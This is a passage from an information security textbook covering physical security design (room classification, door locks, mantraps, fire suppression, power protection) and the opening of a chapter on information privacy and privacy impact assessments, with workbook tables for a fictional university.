© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_9

173

9  Designing Physical Security

174

9.1 Step 1: Inventory Assets and Allocate Sensitivity/ Criticality Class to Rooms Physical attacks can impact confidentiality and integrity, and environmental conditions may impact availability. In the Information Security chapter, we rated assets using a sensitivity classification that included proprietary, confidential, privileged, and public classes. This classification ensures confidentiality and integrity through need-to-know and least privilege. In the Business Continuity chapter, we assigned a criticality class (addressing availability) to important assets, and rated them critical, vital, sensitive, and nonsensitive, depending on the loss we would incur if the assets or data were not available for a period of time. Instead of re-inventing the wheel, why not continue to use these classification systems, already developed, in our goal of physical security? Basically, we define room classifications, including how each class should be handled – and then we assign each room a classification. Our first step is to understand the value of what is in each room and the purpose of the room and the assets (Table 9.1). Figure 9.1 now draws a map of a floor of a building and assigns a sensitivity and criticality class to each room, where the sensitivity class is color-coded. This may be useful for guards to understand their duties. Physical security designs should continue to develop the Defense in Depth concept. When evaluating physical security controls, we should consider both quantity, including cascading controls (multiple sequential defenses), as well as quality, including whether controls are preventive, detective or corrective in nature. Now that you have a good idea how to design physical security, let’s discuss the different types of controls you can select from concerning confidentiality/integrity, then availability. Table 9.1  Allocation of assets (workbook exercise) Purpose of Room room 124 Public classroom

Sensitivity & criticality class Privileged, vital/sensitive

128

Privileged, vital/sensitive

132

Public classroom Public classroom Server room

129

Office

Confidential, non-sensitive

130

Public, non-sensitive Confidential, critical

Sensitive assets or information Computer, projector, display Vital during school year – sensitive otherwise Lab equipment, computer, projector, display Tables, chairs Servers, network equipment, disk and tape drives. Exam/homework papers, laptop, display

9.2  Step 2: Selecting Controls for Sensitivity Classifications

175

Fig. 9.1  Physical security map (workbook exercise) Table 9.2  Sensitivity class handling (workbook exercise) Sensitivity class Proprietary

Description Room contains propriety information storage.

Confidential

Room contains confidential information storage.

Privileged

Room contains end-user computer equipment, PoS devices or controlled substances.

Public

The public is free to spend time in this room, without escort.

Special treatment All cabinets remained locked. Room remains locked when not attended. No visitors are allowed in these areas. Door always locked: two-factor authentication: key-card and password Badge must be visible. Visitors must be escorted. Computers, PoS devices are physically secured using cable locking or other lock-down mechanism. PoS devices inspected daily for tampering/ replacement. Controlled substances locked in cabinets. Doors locked between 9 PM and 7 AM, and weekends unless class in session. (specific rooms may have other lock hours, unless attended by owner.) Unlocked rooms are periodically monitored by guards on a per shift basis. Specific rooms may be locked during evening/ night hours.

9.2 Step 2: Selecting Controls for Sensitivity Classifications Table 9.2 Sensitivity Class Handling shows example controls related to confidentiality and integrity. In Table 9.2, only the two high-priority sensitivity classes are detailed, but all should be described.

176

9  Designing Physical Security

Controls related to confidentiality and integrity include controlling access (or access control) to buildings, rooms, computer and other equipment, and documents. Least privilege dictates that people should have access to information or equipment only if their primary job responsibilities require them to have access. However, some organizations are in the business of serving the public – and they offer the public access to payment card readers, computers, or IT networks, such as gas stations, stores, libraries, schools, and Internet cafes. They need additional physical protections. We review each of these in turn.

9.2.1 Building Entry Controls A few general rules of security are to ensure that your vicinity and grounds are safe and that you screen all entrants into your building/office area [4]. Your vicinity can be selected to be reasonably close to police, fire department, or a hospital, if your industry is prone to require any of them. You can select the location to be in a quiet spot with limited access or a busy spot with high public visibility. The grounds should be well lit at night where you want people to walk. You should guide people to one, or a limited number of entrance(s), where you can screen people and have visitors log in and out. It is possible to establish a map with security zones of your grounds: controlled, security, and public [4]. Crime prevention is subtly used to guide – and manipulate – people to proper behavior in external security. To prevent crime, security uses the defenses of good visibility and public observation. For example, secured doors/windows should be sufficiently well-lit at night to discourage attackers. Avoid using trees and higher bushes around any doors, which could enable hiding. Clearly observable CCTV cameras, public benches and picnic tables in key locations provide unwelcomed witnesses to potential criminals. Similarly, office windows when they overlook the parking lot help to prevent crime. Friendly props, labels and sidewalks can be used to guide people to front entrances and away from side entrances or windows. For example, the use of shrubs, flowers, and other landscaping tell people “do not walk here”, while sidewalks announce “please walk here”. Shrubs should be sufficiently low, below 2.5 feet (or less than 1 m), to ensure visibility. Parking is best located just outside the front door. Signs can be used to attract the public, while the lack of signs tells the public “boring – ignore me.” Creating a friendly atmosphere gives the location a community feeling, where people feel responsible for each other and will help each other, if necessary. People need to feel safe, and good lighting and visibility helps to achieve that. Trees are pleasant and can help to provide the community feeling, but should not hinder visibility where security is an issue.

9.2  Step 2: Selecting Controls for Sensitivity Classifications

177

9.2.2 Room Entry Controls Considering an example story of defense in depth, let us assume an intruder has social engineered her or himself past the front desk, for example by saying he is a computer repair person. The uninformed guard told him where the computer room is, without calling an IT representative first. Let’s look at room controls. Some door locks are better than other door locks. For example, a key lock cannot track entrants; lets people in regardless of time of day; and can easily be circumvented by stealing or copying a key. Other types of door locks include electronic (key card), combination (numbers), and biometric (discussed in the Information Security chapter). The best systems are two or multifactor. Issues to consider with door locks include [3, 4]: can it track who entered at which times? Can it prevent entry by time of day to particular persons? Is it prone to error, theft, or impersonation? How expensive is it to install and maintain? If power fails, should it fail open or closed? A fail secure policy fails locked, but if there is a fire, people must be able to exit. The decision should be considered carefully. Alternatively, an intruder may enter past the front guard via piggybacking. Piggybacking is a means whereby our intruder gains entry by following along with people who are credentialed (by hiding behind others or pretending to be credentialed and/or to be a friend of someone credentialed). Deadman or mantrap doors are an especially safe way to prevent piggybacking [3]. These include a double set of doors, where the space between the doors can only hold one person. A person enters the first door and must shut it before the second door can open. Additional room entry controls may include walls, security cameras, motion sensors, security alarms, guard or patrols. For very high security applications, windows can be reinforced [4]. Tempered glass, acrylics, and wired glass are stronger than regular glass. Regular glass can be made somewhat stronger by applying a film to darken windows and reduce shattering. Door hinges should also be attack-proof. Room entry control procedures may include escorted visitors and employee badges. To continue our intruder story, unfortunately our organization can’t afford guards or security cameras for the IT data center. The intruder hides out and waits for 7 PM, when most people have left. Then he bypasses the door locks by using climbing equipment to enter the computer room through the ceiling panels. Hopefully we have good computer controls.

9.2.3 Computer and Document Access Control This section discusses controls you may take if your equipment is generally handled by employees or trusted volunteers. The suggestions in this section are requirements for confidential information, and many are requirements for HIPAA adherents. Computer access guards include engraved serial numbers, encrypted disk drive(s), encrypted copiers, and disabled disk or USB/disk interfaces. All organization equipment over a given price should be labeled with serial numbers and tracked

178

9  Designing Physical Security

in a database or spreadsheet. Serial numbers can be engraved or labeled with tamper-­ resistant tags specifying the company name (see Fig. 9.1). An equipment inventory should be taken regularly. Device theft recovery solutions can be installed on computers, which enable law enforcement to quickly locate stolen computer equipment. If your computer is stolen, you log into the vendor’s web site and turn on the activate function. According to web pages, features may include: using the computer’s camera to record the image and voice of the next person to use the equipment, or locking out the thief and erasing all data. This software may also provide location information, if not an IP address that law enforcement can track. Not only might you get your computer back, but the thief gets prosecuted! Encrypted disk drives (and their backups) are required to protect personal data, as described in the chapter on Information Security. Laptops and other mobile devices are especially prone to loss and theft. If disks are not encrypted, then it may be tempting to encrypt specific files. However, the password cannot be forgotten, or the file(s) may be lost forever… This is also a problem if the person who created the encrypted files leaves the organization. Commercial copy machines, which can make multiple copies of large documents, contain disk storage sufficiently large to retain many documents. These digital copy machines store documents when they copy, scan, fax, print and email documents. This retention of data is a concern when data is sensitive, since copy data may be accessed via the Internet or if the disk is stolen. In this case, the Federal Trade Commission recommends using copiers with extra security features, including encrypted disks and an overwrite feature [6]. The overwrite feature writes random data over copy files either upon a schedule (e.g., daily or weekly) or after each job run. Remember that encryption is a viable defense for U.S. state breach laws, in case your copy machine disk disappears with confidential data. An alternative or additional control is to specify in the copy machine contract that when the copy machine gets returned, either your organization keeps the disk(s) or the disk(s) are securely destroyed. A notice to this effect should be stuck on the copy machine. Accessing copy disks should be done by a professional, since they are often closely integrated into the copy machine. Improper handling can break the machine. Computers should be protected so that passers-by cannot access other employee’s terminals  – potentially by viewing, keyboarding, and/or saving data off to a USB flash drive. Controls to prevent on-lookers include monitor hoods or privacy monitors, or simply placing the terminals where they cannot be easily viewed by visitors. Lockout function keys or screensaver timeouts can force an employee to login after not using the computer for a period, such as when walking away. USB flash drives and CD/DVD drives can be disabled. If USB drives are not disabled or the computer is portable, antivirus software is important to minimize the probability of malware [7]. Sensitive documents should be shredded upon disposal. A clean desk policy and locked files can ensure that proprietary or confidential papers will not be lying around for on-lookers to see. To finish the intruder story, our intruder has entered the computer room and is looking for the proprietary information server. The servers are in cabinets, which

9.2  Step 2: Selecting Controls for Sensitivity Classifications

179

are not locked – hooray! He powers servers down, and uses a prepared USB flash drive to reboot different computers to the operating system provided on the USB. In some cases he succeeds, and then begins to peruse the server disk contents. Darn, the contents are encrypted and he can’t get in [7]!!! It probably isn’t worth taking the disks, since most likely the disk he is looking for will be encrypted. The whole trip may be wasted! No, he may still succeed… He installs a wireless access point and connects it to an internet outlet, testing it out before he leaves. Yes, internal access! He also leaves around an unmarked DVD and flash drives with Trojan horses on them. For sure someone will pick them up and want to see what is on them… Stay tuned for tomorrow’s episode.

9.2.4 The Public Uses Computers Some organizations may have rooms open to the public that contain computers – either employee computers or computers available for use by the public. In addition to the controls specified in the previous sections, additional precautions can prevent theft and malware takeovers. Theft results when the whole or parts of computer(s) disappear. Figure 9.2 shows how a padlock can be used to lock the backside of a computer, preventing important computer cards or other components from ‘walking away’. If the lock is used in

Fig. 9.2  Computer is padlocked and tethered

9  Designing Physical Security

180 Table 9.3  Allocating controls to rooms (workbook exercise) Room Rm 123 Rm 125 Rm 132

Sensitivity & crit. class Privileged, Vital Privileged, Vital Confidential, Critical

Sensitive assets or info. Computer lab: computers, printer Classroom: computer & projector Servers and critical/ sensitive information

Room controls Cable locking system Doors locked 9 PM-8 AM by security Cable locking system Teachers have keys to door. Key-card entry with password logs personnel. Badges required.

combination with a bike cable, the computer can be physically tethered to a permanent fixture in the room. Publicly-used computers are very prone to malware. Computers can be imaged where all stores to disk (if available) are temporary. In this scenario, every power up results in the same unmodified standard configuration. While this does not prevent malware infestations, it clears the malware every time the computer is rebooted. One issue is that if the imaged computer can be broken into via the Internet, the malware can be reinstalled day after day. This could occur if the computer is not configured properly for security or a login-password becomes known. Ensuring that the image is recently patched will help to prevent intrusions. For example, Microsoft Windows ordinarily releases patches on the second Tuesday of each month (on “Patch Tuesday”) 10 AM Pacific Time, but may release a critical patch on an unscheduled basis. Physical Security Controls can be documented in table form and/or map form. One advantage of the table form is that specific controls for individual rooms can be added to Table 9.1, giving Table 9.3. In the case of the university, there are more individual room situations than easily fit into the three defined sensitivity classes. Thus, there is a choice between defining more sensitivity classes (e.g., Privileged, Public), or allocating control descriptions for individual rooms. Defining too many sensitivity classes can make the classes difficult to remember. Table 9.3 can list all non-public rooms, or list only special handling requirements. For ease of use, Table  9.3 is mainly concerned with Sensitivity controls (not Criticality), since guards are generally only concerned only with the Sensitivity class controls.

9.3 Step 3: Selecting Availability Controls for Criticality Classifications Problems relating to availability include issues with electricity, water, fire, temperature and humidity. Table 9.4 Criticality Class Handling shows example controls to ensure availability or reliability. In Table 9.4 only the two top availability-related classes (Critical, Vital) need be described, but others can be. Problems with electricity can include lost, reduced, or unsteady electrical currents [3]. A blackout is a total loss of power, which can occur for short or longer

9.3  Step 3: Selecting Availability Controls for Criticality Classifications

181

Table 9.4  Criticality class handling (workbook exercise) Criticality class Critical

Vital

Special treatment (Controls related to Availability) Availability controls include: Temperature control, UPS, smoke & water detectors, fire alarm, fire suppressant, emergency power-off switch inside/outside door. Room contains vital computing Availability controls include: surge protector, resources, which can be temperature control, fire extinguisher. performed manually for a short time. Description Room contains critical computing resources, which cannot be performed manually.

durations. Irregular power levels can cause damage to computer equipment, including crashes. Such power fluctuations include a brownout, which is a consistently reduced power level; or sags, spikes and surges, which are momentary changes in electrical levels. Power levels may fluctuate due to high period use (e.g., very hot days); electromagnetic interference (EMI) caused by electrical storms; or by sharing electrical circuits with departments who vary their electrical usage [4]. Therefore, it is a good idea to have data centers on their own circuits. Fortunately, equipment to protect computers are relatively cheap. A surge protector regulates electrical surges for durations measured in milliseconds, by sending excess current to ground [3, 4]. Voltage regulators or conditioners provide a nice steady power stream. A Universal Power Supply (UPS) provides regulated power with battery backup for about 30 minutes, depending on battery supply. More expensive power generators are required to extend electrical power beyond 30 minutes, including for hours or days. An Information Processing Facility (IPF or computer room) should have a number of additional availability controls [3, 4]. Smoke detectors can warn of fire, and should be placed above and below ceiling tiles, and under the room floor. Detectors are placed at the highest point in each enclosure (e.g., attached to the underside of the floorboard). Manual fire alarms and fire extinguishers should also be available within 50 feet of electrical equipment. Fire extinguishers should be tagged and inspected annually. Alarms should sound locally, at any monitored guard station, and preferably at the fire department. Water detectors are useful if natural or manmade flooding is possible or if water is used as a fire suppression system anywhere in the building. Water is particular dangerous in an IPF due to electrical shock; people should be trained for handling such risks. Water detectors should be placed under raised floors at the lowest point in that enclosure (e.g., on the ground below the floorboard) and their locations should be marked on the floor. An emergency power-off switch is useful to turn off power to all equipment, if a fire or flood occurs. There should be a switch both inside and outside the IPF room. Air conditioning prevents computer overheating, which can result in computer malfunctioning in the short term, and shorter equipment lifespan over the long term. Your equipment manufacturer can provide exact specifications for your computer equipment, but ASHRAE standards currently recommend that computer equipment

182

9  Designing Physical Security

be maintained between 64.4-80.6 °F temperature and 20-80% relative humidity [5]. High and low humidity can cause corrosion or electric static, respectively. Antistatic bags and flooring can protect electrical equipment from these electrical surges, when equipment is carried around [4]. Some fire suppression systems are safe and some are dangerous – to equipment or human beings. The safe suppression systems include those that don’t kill people or damage equipment, like FM-200 or Argonite. FM-200 foam cools equipment down, lowering the risk of combustion, while Argonite is a life-friendly gas. Fire suppression systems that are dangerous to humans include carbon dioxide and halon. While these gas systems do not damage equipment during a fire, they do replace oxygen and thus require lead time for people to exit. Halon was also banned due to its damage to the ozone layer. Water sprinklers are popular but water tends to damage computer equipment. Although water is safe to humans, water conducts electricity well. Therefore, power should be turned off before a water sprinkler is discharged [4]. Air conditioning should simultaneously be turned off, since oxygen fuels fires. With Wet Pipe or Charged water sprinklers, pipes always carry water and can break or leak, while Dry Pipe systems carry water only when a fire is detected. Thus, Dry Pipe is safer in northern environments, where pipes could freeze. The computer room is best located on a middle floor [3]. If the floor is too low, it is prone to break-ins and flooding, while if it is too high, the fire department cannot easily reach the floor to put the fire out. The fire department should inspect the room annually. Policies should state that there is no smoking, food or water in the IPF. The IPF should be configured with fire-resistant walls, floor, ceiling, furniture, and electrical panel and conduit. Walls should have a two-hour fire resistance rating. In general, thicker walls have better ratings [4]. Redundant power lines reduce the risk of environmental hazards. An auditor would observe that some sample controls are in place [3]. They should test sample batteries, handheld fire extinguishers, and ensure the fire suppression system is to code. They may inspect documentation, including policies and the physical security plan.

9.4 Questions and Problems 1. Vocabulary. Match each meaning with the correct vocabulary. Voltage regulator FM 200

Universal power supply Deadman door

Emergency power off switch Wet pipe

(a) A double set of locked doors prevents piggyback entry. (b) A device which eliminates power sags and surges. (c) A fire suppression system that sprays water, but may freeze in cold temperature climates.

9.4  Questions and Problems

183

(d) A fire suppression system that sprays a life-friendly foam, which cools equipment down and lowers the rate of combustion. (e) A technique to turn off power to all equipment. (f) A device which provides regulated power with battery backup for about 30 min. 2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook (at https://sn.pub/lecturer-material), Physical Security Chapter to complete the tables. For each table, include five or more information or asset types, and three roles. (a) Create a ‘Sensitivity Class Handling’ Table, similar to Table 9.2. (b) Create a ‘Criticality Class Handling’ Table, similar to Table 9.4. (c) Create a Map, similar to Fig.  9.1. This map may be small but contain representative types of rooms that would be used in this industry. (d) Create an ‘Allocating Controls to Rooms, similar to Table 9.3. 3. Product Evaluation. Select one security product to evaluate: CCTV, UPS/voltage regulator, fire suppression system, location-based software, encrypted copy machine, door locks, and point-of-sale devices. Look up different websites for this one security product, and select three products to evaluate. What security services do they appear to provide and for what price? 4. Regulation relating to Physical Security. Consider one of the following security regulations or standards from your nation. What requirements do they have related to Physical Security? Some websites provide government- or standards-­ based information, and thus are authentic sources of information. Consider these sites if in the United States: (a) General Data Protection Regulation: https://gdpr.eu (European Union)  or Chap. 17 (b) IPAA/HITECH: www.hhs.gov(Health and Human Services) or Chap.19 (c) Gramm–Leach–Bliley/Red Flags Rule: www.business.ftc.gov (Federal Trade Commission) (d) Sarbanes–Oxley: www.isaca.org or www.sans.org (Organizations for standards/ security) (e) PCI DSS: www.pcisecuritystandards.org: Requirements and Security Assessment Procedures v. 4.0. (f) FISMA: www.nist.gov (National Institute for Standards and Technology)

9.4.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

9  Designing Physical Security

184 Case study Designing physical security

Health first case study √

Other resources Security workbook, GDPR or HIPAA notes

References 1. Perlroth N (2020) This is how they tell me the world ends. Bloomsbury Publishing, New York 2. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise. com/DBIR/2013. Accessed 20 Oct 2013 3. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 189–192, 381–386 4. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 427–499 5. ASHRAE (2011) Thermal guidelines for data processing environments – expanded data center classes and usage guidance. American Society of Heating, Refrigerating and Air-Conditioning Engineers, Inc, www.ashrae.org 6. FTC (2010) Copier data security: a guide for businesses. Federal Trade Commission, pp 1–6. business.ftc.gov. November 2010 7. Conklin WA, White G, Williams D, Davis R, Cothren C (2011) CompTIA security+ all-in-one exam guide, 3rd edn. McGraw-Hill Co., New York, pp 581–595

Chapter 10

Attending to Information Privacy

If it’s free, you’re probably the product. – David Kelleher 2014 [1] …for now know that every border you cross, every purchase you make, every call you dial, every cell phone tower you pass, friend you keep, site you visit, and subject line you type, is in the hands of a system whose reach is unlimited but whose safeguards are not. – Edward Snowden, CITIZENFOUR trailer The $200 billion data broker industry results in the collection and storage of nearly every U.S. household and commercial transaction. The FTC found one data broker firm possessed 1.4 billion consumer transactions, while another held data tied to $1 trillion in consumer spending. A third broker had 3,000 separate pieces of data for nearly every U.S. consumer. – Jessica Davis, Senior Editor Healthcare, SC Magazine [3]

Whether you purchase through the internet or via credit in physical stores, your purchases are recorded. Using data analytics, companies have discovered patterns. One pattern Target recognized in 2012 is whether a woman is pregnant or not, through purchases of unscented lotion, followed by vitamins, and finally scent-free soap and cotton balls [2]. Recognizing the pattern, Target advertises to these women products for new mothers. One father got upset that his teenage daughter was being advertised to in this way, complained to Target, then later apologized when he found out it was true. While it may be convenient that we are advertised to for products we are likely to buy, it may also make us uncomfortable that industry knows everything about us. It is worth reiterating Edward Snowden’s statement from his CITIZENFOUR trailer: “…for now know that every border you cross, every purchase you make, every call you dial, every cell phone tower you pass, friend you keep, site you visit, and subject line you type, is in the hands of a system whose reach is unlimited but whose safeguards are not.” While advertising may be a relatively minor issue, privacy can become a concern. We consider privacy issues, for example, for a woman choosing an abortion, who lives in a state or nation where it is illegal, but she travels to a state or nation where it is legal. Her privacy expectations may be that the state does not know what she is doing when outside that state (excessive authorization) and in fact, the state has no right to monitor her every move (surveillance). With or without her traveling, if there is a natural miscarriage, the state can assume an abortion (inaccurate data),

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_10

185

186

10  Attending to Information Privacy

resulting in a distracting court case, a forced public discussion of her pain of losing the child (induced disclosure) and embarrassment over the public charge (stigmatization). Or perhaps hacktivists break into the hospital or abortion clinic’s data and sell the information to the state and news media (breach). Even if her identity is hidden in organizational files, her data may be exposed (re-­identification) if the aggregated data sets do not sufficiently hide personal data (revealed data), which could happen if her zip code is rare within the organization. Then from the state’s perspective, they feel they have a right to this confidential data (restricted data). These issues [4] are not just a concern to this case, but also to medical, psychological, legal, and personal issues of hardship, such as poverty or sickness. Referencing these privacy concerns can be helpful when completing a risk analysis. Privacy relates to the existence of an informational boundary between one person and others. NISTIR 8062 defines ‘security’ as “… unauthorized activity that causes a loss of confidentiality, integrity or availability of information or systems.” [5, p. 8] In contrast to security, privacy is concerned with the effects (intended or unintended) of authorized processing on an individual’s privacy. The effects of technology can impact people’s lives and society in poorly-understood ways. As demonstrated by the story of the woman who might choose abortion or lose a baby, these losses can include loss of trust in the system, loss of self-determination, financial loss, and discrimination/stigmatization. Any information that can be attributable to an individual is often referred to as Personally Identifiable Information (PII), whether that information is alone or in combination. Privacy and security together ensure that only authorized processing of PII occurs (security) and this authorized processing impacts lives only in personally acceptable ways (privacy). At a high level, the governance process to design data privacy includes: identifying all personal information in the organization that falls within privacy guidelines; identifying applicable legal and regulatory requirements; creating appropriate policies, procedures, and guidelines to protect privacy; and implementing those policies [4]. (From Chap. 6 Governance remember that policies are executive-level organizational mandates, procedures are outlined, detailed processes, and guidelines are recommendations.)

10.1 Important Concepts and Principles Defining terms is important as a first step. Data is considered digital information, whereas information is defined as content that can be in hard copy, audio, visual, written notes, and/or digital forms [4]. The person for whom the data is stored is called the data subject, and the organization or entity storing the data is called the controller (from the European Union’s General Data Protection Regulation) [9]. If security is concerned with confidentiality, integrity and availability, privacy engineering may be concerned with disassociability, predictability, and manageability [5]. Disassociability ensures information cannot be attributed to a single identity, beyond what is necessary for processing. It ensures that privacy is assured through minimal exposure even during authorized access. Predictability can be translated into reliable trustworthiness, which enables users and owners to trust the

10.1  Important Concepts and Principles

187

system. Trust is earned through transparency, arising through the clear communication to data subjects about how their data will be used, and accountability, which is the consistent implementation of this policy. Manageability allows for ‘granular administration’ of ‘selective exposure’, changes, and purging of PII [5] and is concerned with the accuracy of information and fair treatment of data subjects. Data quality is the usefulness of data for a consumer [11]. It measures the accuracy and completeness of the data. Data can be ill-calibrated and flawed: statistics may be used to present false information in order to make a sale or gain economic advantage. Data quality should be the measure of confidence the user has in the data. However, the data a consumer wants may not match the data a provider is willing to provide, for security risk reasons. Accuracy and Quality ensures that data fulfills its requirements, including [4]: • Quality: Fits the purpose for which it will be used. Includes: –– Complete, unique, timely, valid, accurate, consistent • Accurate: Data must match its real world object • Consistent: Data content matches its definition consistently across objects • Valid: Data content matches its contextual type Other important principles related to data privacy include [5, 9, 16]: Purpose limitation: Data is collected and used only for its explicitly defined intention; however, it may also be used for approved public interest or research purposes. This is also known as Purpose Specification. Data minimization: Only the minimum, necessary data is collected and used to fulfill the defined (or legally authorized) purpose. Storage limitation: Data is not be retained for longer than necessary, although archive may be possible for public interest or statistical purposes. Individual Participation: Individuals have the right to know how their information will be created and used, consent to this use, and have their privacy issues resolved. Access and Amendment: Individuals have the right to see and an opportunity to correct their records. Confidentiality and Integrity: Data shall be processed in a secure way, e.g., by providing only authorized access to data. Organizations have the following responsibilities in implementing these privacy policies [7]: • Authority: An organization may collect, process or use PII only if it has been granted authority to do, and shall provide, via notification, from where the authorization was granted. • Transparency: Organizations shall provide clear and accessible notices as to the PII it collects, and how the information is collected, used, processed, stored, disseminated and to whom it may be released. • Accountability: Organizations are responsible for documenting privacy policies and training employees, then confirming that data privacy practices are practiced, via documented audit.

188

10  Attending to Information Privacy

Data privacy notifications may assure customers but may also be the law. With the passage of privacy laws (e.g., GDPR, CCPA, HIPAA, Japan’s Protection of Personal Information) privacy is a recent arrival within security. This general section plans for the implementation of data privacy, including (1) tracking data (data purpose, inventory), (2) privacy impact assessments and controls (de-identification, data life cycle, data persistence) and (3) documentation (privacy notices, consent forms). The Information Security chapter’s data classification tables defines how data is to be handled, addressing permissions, media storage, labeling and handling, transmission, migration, data warehousing, archive and retention, and disposal and destruction. These are all important aspects of the data lifecycle, but classifying according to Sensitivity Class is not specific to any dataset: such as tracking where the data is stored, what organizations have access to it, what contracts refer to it, and how specifically data was purged. Thus, knowledge refinement and documentation are important for specific privacy-protected data. In addition, there is new information and new quality goals that needs to be evaluated and documented as part of the data lifecycle, including data purpose, proper authorization for the processing and use of data, and tracking methods of processing data [4]. Designing privacy is useless unless the organization understands the full lifecycle of each PII dataset, and that cannot be performed with a clear understanding of the data inventory. The three steps that are part of defining information privacy start with documenting all information that require privacy protections, as part of a data dictionary. Step two involves performing a risk analysis, called a privacy impact analysis, that includes defining controls. Step three involves documenting a Notice of Privacy Practices, to communicate with clients their rights and privileges.

10.2 Step 1: Defining a Data Dictionary with Primary Purpose The first step is to understand what data an organization has (or needs) and how and why it is used. This is also important in performing a Privacy Impact Assessment (PIA) and classifying information. Data is classified as part of the Information Security chapter, but now we will extend (and potentially update) that table to add a primary purpose and other fields. A proper data inventory describes the types of personal data collected as well as compliance requirements. To start that list, remember that information is generally retained in databases. Database development requires the definition of a data dictionary, which tracks how data tuples or records relate and what data attributes are contained in each record. A data dictionary generally includes metadata, which is a description of each record and data item (but not the contents). With multiple databases, it is helpful to have one metadata repository in a business, describing the full business information. This repository is called a business glossary, which is the overall complete, independent list of data that defines business usage for data. The business glossary also links data definitions to its source (e.g., database), where the actual storage occurs. The data inventory is the entire collection of business glossary and databases.

189

10.2  Step 1: Defining a Data Dictionary with Primary Purpose

The Einstein University data inventory includes forms required by International Student Services, which are manually or electronically signed, scanned, and archived for government verification purposes. Since these are pdf forms, it is important to also list the attributes required on the form. An example is shown in Tables 10.1 and 10.2. Table 10.1  Data inventory for international student services at Einstein University (workbook exercise) Department(s) Location Data owner Data title

Financial Sponsorship form

Curricular Practical Training (CPT) Application

Optional Practical Training (OPT) Application

Exception to Full-Time Status

International Student Services (ISS) ISS Database Designated school official (DSO): Janet Gulbrandsen Purpose, description Life cycle Format When created; last need Government-required After admit; PDF documentation for before I-20 international students to show immigration they have sufficient funds to document is study in the U.S. for the full issued for Visa duration of the educational interview. program. Archived for gov’t review. Government-required May be created PDF documentation for after 1 year of International F-1 students to study in the be eligible for practical U.S. training related to their major, Archived for before education ends. gov’t review. Regulation: 8 Code of Federal Regulations (CFR) 214.2(f)(10) and (f)(10(i) Government-required May be created PDF documentation for after 1 year of International F-1 students to study in the be eligible for practical U.S. training related to their major, Archived for before or after education gov’t review. ends. OPT applicants must also apply to U.S. Citizenship and Immigration Service (USCIS) Regulation: 8 Code of Federal Regulations (CFR) 214.2(f)(10) through (13) 8 CFR 274a.12(c)(3) Government-required May be created PDF documentation for any semester of International students to study study in the in the U.S., without being full U.S. time; explaining cause. Archived for gov’t review.

Classification, rights, restrictions Confidential, nonsensitive (contains financial information) Accessible to ISS staff only. Private, nonsensitive (resume-type information) Prepared by student, advisor, employer, DSO.

Private, nonsensitive (resume-type information) Prepared by student, DSO.

Private, nonsensitive (educational-type categories) Prepared by DSO, student, advisor.

190

10  Attending to Information Privacy

Table 10.2  Data dictionary for some international student services records (workbook exercise) Form Data attributes Curricular Practical Training (CPT) Application Student name, major, degree program Form Expected date of graduation Visa status, passport expiration Qualification for CPT Academic department Concurrent course taken Student contact information, date and signature Advisor contact information, date and signature Start and end date for employment Position title Full time-part time status Paid-unpaid status Position description Name of company Employer contact information, date and signature Exception to Full-Time Status Form Student name, date and signature Student ID Semester Reason for being less than full time Advisor name, date and signature ISS advisor name, date and signature

10.3 Step 2: Performing a Privacy Impact Assessment After a data inventory is created, a risk analysis related to privacy can be performed. This analysis will occur through a Privacy Impact Assessment (PIA). If privacy is concerned with authorized, but inappropriate processing, then privacy risk is concerned with problematic data actions [5]. While security is concerned with risk at the organizational level, privacy is concerned with risk at the personal level. This can include legal issues or loss of morale, trust or interest in using a service. An example of a problematic data action can be profiling, which is processing to analyze or predict someone’s personal interests, preferences, behavior, movement, work performance, or financial or health situation [4]. The major steps of the PIA are shown in Fig. 10.1. Major factors to consider as part of a privacy risk model include: (1) applicable regulation; (2) external factors; (3) third party relationships (e.g., contracts); and (4) internal factors relating to the organization [6]. Regulatory considerations include how national and international regulation(s) affect the business, including mandated controls. Once we understand where we are and where we want to be, a gap analysis determines how to achieve the desired state. (Obtaining legal expertise can help.) In addition to regulation, external factors may include industry

10.3  Step 2: Performing a Privacy Impact Assessment

Regulation

Risk

Controls

Prioritize

191

•Address legal, regulatory, contractual and policy requirements •Assess risk, including threats, vulnerabilities, impact and likelihood •Design controls for mitigating privacy risks •Prioritize and implement privacy controls and practices

Fig. 10.1  Procedure for privacy impact assessment

standards and societal expectations. Third party relationships include privacy obligations in contracts and subcontracts including for partners and suppliers. Internal factors include the organization’s risk tolerance, brand reputation, ethical culture, and technical capabilities. The entire data lifecycle should also be considered, since data in all its stages must be controlled, including collection, use, storage, sharing, and destruction [4]. The PIA process generally follows the risk management process, including a risk analysis, risk assessment and action plan [6]. The privacy risk analysis would evaluate the risk factors mentioned above as well as risk scenarios. Then risk assessment would use qualitative, quantitative, or semi-quantitative analysis techniques, as outlined in the chapter on risk. A cost-benefit analysis should evaluate controls for both security and privacy purposes, since they are interrelated. However, the analysis may conclude that controls are not feasible, and that the project needs to reduce functionality. An action plan would prioritize control implementation. The following 3 tables show a modified version of the GDPR Data Privacy Impact Analysis (DPIA) [8], including an outline of processing and concerns (Table  10.3), a privacy risk analysis (Table  10.4) and a summary of controls (Table 10.5). In the example shown, the Financial Sponsorship Form has been prioritized, since its classification ranks as Confidential. Other forms rank as Protected, which are lower priority. Table 10.4 is the traditional risk analysis applied to privacy and security. Notice that the type of privacy issues (e.g., breach, stigmatization, de-identification) are described, along with the security issues to the data controller. After performing a risk analysis, it is now possible to prioritize risk and define how controls can be implemented to safeguard data. The next step in the Privacy Impact Analysis is to evaluate controls, prioritize changes, and develop a Corrective Action Plan to implement the required changes.

192

10  Attending to Information Privacy

Table 10.3  A modified GDPR data privacy impact analysis (part 1) (workbook exercise) Information type Primary purpose: What is the primary purpose of processing this data? What are the benefits of the processing – for your organization, and more broadly? What is the intended effect on data subjects?

